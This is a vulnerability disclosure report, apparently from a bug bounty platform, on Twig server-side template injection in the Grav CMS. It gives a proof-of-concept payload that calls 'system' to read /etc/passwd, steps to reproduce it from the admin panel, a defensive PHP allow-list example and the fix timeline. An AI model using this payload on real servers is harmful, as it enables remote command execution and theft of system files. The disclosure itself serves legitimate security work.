Server Side Template Injection in getgrav/grav

Valid

Reported on

Apr 7th 2022


Description

Grav is vulnerable to Server Side Template Injection (SSTI) via Twig: a string passed as the arrow argument of the `filter` Twig filter is invoked as a PHP callable, so `filter('system')` executes an operating-system command. According to a previous vulnerability report, Twig should not expose dangerous PHP functions such as system by default.

PoC video.

Proof of Concept

Payload:

{{['cat\x20/etc/passwd']|filter('system')}}

  1. With an authenticated user, access the admin panel.
  2. Edit a page, enabling Twig in the Advanced tab.
  3. Put the payload in the content.
  4. Save and check out the post.
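As an added defensive example (not Grav's fix and not code from the report), the following Twig extension overrides the core `filter` filter so that a string arrow such as `'system'` is rejected unless it is explicitly allow-listed; the class name, the allow-list, and both templates are constructed for illustration, and Twig 3.x installed through Composer is assumed:

```php
<?php
// Added example, not Grav's own fix: override Twig's "filter" filter so a string
// arrow such as 'system' cannot turn it into an arbitrary PHP function call.
// Assumes Twig 3.x installed with Composer (composer require twig/twig).
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Extension\AbstractExtension;
use Twig\Loader\ArrayLoader;
use Twig\TwigFilter;

final class SafeArrowExtension extends AbstractExtension
{
    // Pure helpers that may be named as a string arrow; everything else is denied.
    private const ALLOWED_STRING_ARROWS = ['trim', 'strtolower', 'strtoupper', 'is_numeric'];

    public function getFilters(): array
    {
        // Same name as the core filter: an extension added later overrides it.
        return [new TwigFilter('filter', [$this, 'safeFilter'])];
    }

    public function safeFilter(iterable $items, $arrow): array
    {
        // Twig arrow functions (v => ...) compile to Closures. A bare string such as
        // 'system' passes only if allow-listed; is_callable('system') is true, so
        // callability is not a safe gate.
        if (!$arrow instanceof \Closure
            && (!is_string($arrow) || !in_array($arrow, self::ALLOWED_STRING_ARROWS, true))) {
            throw new RuntimeError('"filter" accepts only arrow functions or allow-listed helpers.');
        }
        $kept = [];
        foreach ($items as $key => $value) {
            $keep = $arrow instanceof \Closure ? $arrow($value, $key) : $arrow($value);
            if ($keep) { $kept[$key] = $value; }
        }
        return $kept;
    }
}

$twig = new Environment(new ArrayLoader([
    'benign'  => '{{ [1, 2, 3]|filter(v => v > 1)|join(",") }}', // constructed template
    'payload' => '{{ ["id"]|filter("system") }}',                 // shape of the reported payload
]));
$twig->addExtension(new SafeArrowExtension());
echo $twig->render('benign'), "\n"; // 2,3
try {
    $twig->render('payload');       // rejected before system() could be reached
} catch (RuntimeError $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
```

The `map` and `reduce` filters take an arrow argument in the same way and need the same gate. Twig's own rejection of non-Closure arrows only applies when its sandbox extension is active, so an installation that renders templates unsandboxed needs a check of its own.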

Impact

Remote command execution on the server hosting Grav, by any user who can edit page content in the admin panel.

References

We are processing your report and will contact the getgrav/grav team within 24 hours. 4 months ago
Renan Rocha modified the report
4 months ago
We have contacted a member of the getgrav/grav team and are waiting to hear back 4 months ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the getgrav/grav team. This report is now considered stale. 3 months ago
Matias Griese modified the Severity from Critical (9.1) to Critical (9.9) 2 months ago
Matias Griese modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago
Matias Griese (Maintainer), 2 months ago:
This issue has been fixed, but we're waiting for a release before going public.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability 2 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the getgrav/grav team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the getgrav/grav team. We will try again in 10 days. a month ago
Matias Griese confirmed that a fix has been merged on 9d6a2d a month ago
Matias Griese has been awarded the fix bounty
Twig.php#L164-L210 has been validated